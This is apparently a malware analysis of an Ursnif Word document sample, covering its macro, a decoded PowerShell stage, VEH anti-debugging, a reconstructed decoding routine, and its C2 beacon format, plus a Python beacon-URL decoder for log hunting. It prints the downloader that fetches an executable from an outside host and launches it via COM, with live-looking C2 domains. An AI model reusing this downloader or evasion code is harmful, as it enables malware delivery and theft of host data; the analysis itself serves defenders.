ursnif
Basic information

| Sample name | 5f894602e88263e34dcdbb2eb2da3078.doc |
|---|---|
| Sample type | doc |
| Malware type | worm / remote-access trojan |
| MD5 | cc7ceb281d0780a1514f99a635ca35e4 |
| SHA256 | 3122695bb31fa85dc8ff21b6f5f2ded5a1f306ea2520edafd44a653b2d277eef |
Main execution flow
When the document is opened, the macro reads the payload hidden in an InlineShape's AlternativeText and launches PowerShell to run it. The PowerShell code downloads a file and starts it through the ShellBrowserWindow COM object.
The EXE decodes its data section and runs the code there; that code in turn decodes the PE code, triggering a large number of access-violation exceptions along the way as anti-debugging to hide the malicious behaviour. The decoded PE code then maps the shellcode.
The shellcode collects some key host data, encrypts it, encodes it into the form of a URL and sends it to the C2 server.
Overview of key techniques
- Network activity
A COM object is used to start Internet Explorer and send the data; launching the EXE also relies on a COM object.
- Exception-based anti-debugging
A vectored exception handler (VEH) is registered and exceptions are deliberately triggered to interfere with debugging.
- Traffic obfuscation
Some legitimate-looking traffic is mixed in.
Detailed analysis
doc
The macro code is obfuscated. Debugging it yields:
GetObject("new:0006F03A-0000-0000-C000-000000000046").CreateObject("Wscript.Shell").Run! fJjbjrHVMN,CInt(0)
This CLSID is associated with Outlook.
The payload is hidden in InlineShape.AlternativeText.
The cmd command line, printed with Debug.Print, is:

```
cmD.exe /c P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand ... AAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAA0ACgB9AA0ACgANAAoARQB4AGkAdAA7AA0ACgANAAoA
```
Base64-decoding the PowerShell command line gives:

```powershell
# Create a WebClient through Activator and find DownloadData by reflection, avoiding an obvious method call
$instance = [System.Activator]::CreateInstance("System.Net.WebClient");
$method = [System.Net.WebClient].GetMethods();
foreach($m in $method){
if($m.Name -eq "DownloadData"){
try{
# Download the second-stage executable
$uri = New-Object System.Uri("http://seauj35ywsg.com/2poef1/j.php?l=zepax6.fgs")
$response = $m.Invoke($instance, ($uri));
# Write it to CommonApplicationData (C:\ProgramData)\lKCFZ.exe
$path = [System.Environment]::GetFolderPath("CommonApplicationData") + "\\lKCFZ.exe";
[System.IO.File]::WriteAllBytes($path, $response);
# CLSID of ShellBrowserWindow; ShellExecute through it launches the downloaded file
$clsid = New-Object Guid 'C08AFD90-F2A1-11D1-8455-00A0C91F3880'
$type = [Type]::GetTypeFromCLSID($clsid)
$object = [Activator]::CreateInstance($type)
$object.Document.Application.ShellExecute($path,$nul, $nul, $nul,0)
}catch{}
}
}
Exit;
```

The downloaded file is launched through ShellBrowserWindow.
exe
Network connection
A COM object is used to create an instance of an out-of-process Internet Explorer object.
https://www.fireeye.com/blog/threat-research/2010/08/reversing-malware-command-control-sockets.html
CLSID
IID
The Navigate method of the IWebBrowser interface is called.
Some domains are obtained:
c58fdzlitzy.band
sa75robb.company
hkelleyae52.city
Monitoring with Huorong shows HTTP requests, but the connections are no longer live; the traffic also contains some legitimate-looking requests to evade detection.
Dynamic debugging
The .data section is set to read/write/execute and decoded. The decoding algorithm is roughly as follows, in three groups; the initial key is E70FCE1D.
Translated into pseudo-C (made compilable; the operator precedence and the missing assignments of the original notes have been fixed):

```c
#include <stdint.h>
#include <stddef.h>

static uint32_t ror(uint32_t v, int n) { return (v >> n) | (v << (32 - n)); }

void decode_data(uint8_t *data_encode, size_t len /* 0x956 in the sample */)
{
    uint32_t key = 0xE70FCE1D;                  /* initial key */
    for (size_t i = 0; i < len; i++) {
        if ((i & 3) == 0) {                     /* every 4th byte: update the key */
            /* keep the high 16 bits, double the low 16 bits (mod 0x10000) */
            key = (key & 0xffff0000) | (((key & 0xffff) * 2) & 0xffff);
            /* the original notes write ror here but describe it as a 3-bit rotate left */
            key = ror(key, 3);
        }
        data_encode[i] ^= (uint8_t)key;         /* XOR with the low byte of the key */
        key = ror(key, 8);
    }
}
```
GetCurrentProcessId and OpenProcess are then called.
The individual PE sections are decoded again. If a breakpoint is set here, the program raises an exception, so single-step with F7 when debugging.
The program registers a VEH and uses VirtualProtect to change page protections, triggering a large number of access-violation exceptions as anti-debugging. The VEH changes the code section's protection and writes data into it, namely the addresses of the APIs to be called.
Calling GetModuleHandle still triggers an exception; the memory being written to must be given read/write permission.
A memory mapping is created (handle 0x90) with base address 0x500000, later confirmed to be the shellcode.
Opens ntdll
Reads the export table to obtain the addresses of LdrLoadDll and LdrGetProcedureAddress
GetUserNameW
Function calling pattern:
call edi
LdrLoadDll
LdrGetProcedureAddress
jmp eax
GetComputerNameW
cpuid is used to obtain system information
0x522643
The string IE10RunOnceLastShown_TIMESTAMP is found
soft=3&version=214071&user=d25f522aee878f97ea41ac1bbdb9aaa7&server=12&id=3261&crc=1&uptime=28121
The data is put through a series of XOR operations and then base64-encoded. In the base64 output, / is replaced by _2f and + by _2b; '/' characters are then inserted at random positions, .avi is appended, and the domain plus /images/ is prefixed, giving:
c58fdzlitzy.band/images/K_2Ferq85SD4wdyo/nPzb86ReUIgCMzq/bvAOE0gcOldJuu3tvq/GNOMZw8I0/Ntc43EVpiVoWeAKpau4X/emftHc8IkMLHDB_2+zO/xYun84veMNifPS4yKsJFXi/HbSgy0a4QhWRq/ad5_2+rD/8e05uC9AXiwTdkn/z.avi
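As an added example (not from the original analysis), a decoder that reverses the URL layout just described, which an analyst can run over proxy logs to recover the still-XOR-encrypted beacon bytes; the encoder exists only to build test input. The XOR pass, whose key the write-up does not give, is not modelled, and the seed, domain and sample payload are constructed.

```python
import base64
import random
import re

# Beacon URL layout from the analysis above:
#   <domain>/images/<base64 with '/'->'_2f' and '+'->'_2b', '/' inserted at random>.avi
# '+' is also accepted in the body because the captured sample contains "_2+".
BEACON_RE = re.compile(
    r"^(?:https?://)?(?P<host>[^/]+)/images/(?P<body>[A-Za-z0-9_+/]+)\.avi$")


def encode_beacon(payload: bytes, domain: str, seed: int) -> str:
    """Build a beacon URL following the described layout (constructed test input only).
    The XOR pass that precedes base64 in the real sample is not modelled here."""
    body = base64.b64encode(payload).decode().rstrip("=")
    body = body.replace("/", "_2f").replace("+", "_2b")
    rng = random.Random(seed)          # deterministic so results are reproducible
    chunks, pos = [], 0
    while pos < len(body):             # insert a '/' every 8-20 characters
        step = rng.randint(8, 20)
        chunks.append(body[pos:pos + step])
        pos += step
    return f"{domain}/images/{'/'.join(chunks)}.avi"


def is_beacon_url(url: str) -> bool:
    """Cheap structural check usable as a log-search predicate."""
    return BEACON_RE.match(url) is not None


def decode_beacon(url: str):
    """Return (host, XOR-encrypted beacon bytes), or None if the URL does not fit the layout."""
    m = BEACON_RE.match(url)
    if m is None:
        return None
    body = m.group("body").replace("/", "")            # drop the randomly inserted '/'
    body = re.sub(r"_2[fF]", "/", body)                # undo the custom substitutions
    body = re.sub(r"_2[bB]", "+", body)
    body += "=" * (-len(body) % 4)                     # restore base64 padding
    try:
        return m.group("host"), base64.b64decode(body, validate=True)
    except ValueError:                                 # binascii.Error is a ValueError
        return None


if __name__ == "__main__":
    sample = b"soft=3&version=214071&user=d25f522aee878f97ea41ac1bbdb9aaa7"  # constructed
    url = encode_beacon(sample, "c58fdzlitzy.band", seed=1)
    print(url)
    print(decode_beacon(url))
```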
This is sent to the C2 through the COM object's Navigate method.
Since the C2 does not respond, the program exits.